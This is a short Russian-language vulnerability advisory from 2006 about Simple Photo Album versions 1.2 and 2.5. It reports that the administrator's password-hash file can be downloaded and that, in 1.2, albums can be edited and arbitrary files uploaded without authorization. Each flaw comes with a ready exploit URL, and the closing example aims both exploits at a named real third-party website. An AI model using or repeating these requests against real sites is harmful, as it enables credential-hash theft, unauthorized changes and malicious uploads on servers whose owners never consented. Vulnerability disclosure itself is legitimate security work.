Software: Simple Photo Album - 1.2 и 2.5
Vendor: www.gieson.com
Vulnerability: получение удаленным пользователем файла с хешем администратора Simple Photo Album в 1.2 и 2.5, возможность редактирования фотоальбома в обход авторизации, загрузка произвольных файлов - версия 1.2.
Risk: высокий
Date: 7.11.2006
discovered by durito [damagelab] -durito[at]mail[dot]ru-
HTTP: durito.narod.ru
www.damagelab.org
+~~~:| Details |:
Получение удаленным пользователем файла с хешем администратора Simple Photo Album в 1.2 и 2.5.
+~~~:| Экплойт |:
http://target.com/Simple Photo Album/albums/pwd.txt
+~~~:| Details 2 |:
Возможность редактирования фотоальбома в обход авторизации, загрузка произвольных файлов - только версия 1.2
+~~~:| Экплойт |:
http://target.com/Simple Photo Album/index.php?action=editAlbum&displayAlbumName=[имя_фотоальбома]
++++++++++++++++++++++++++
пример:
http://www.keebonk.ch/pix/albums/pwd.txt
http://www.keebonk.ch/pix/index.php?action=editAlbum&displayAlbumName=set9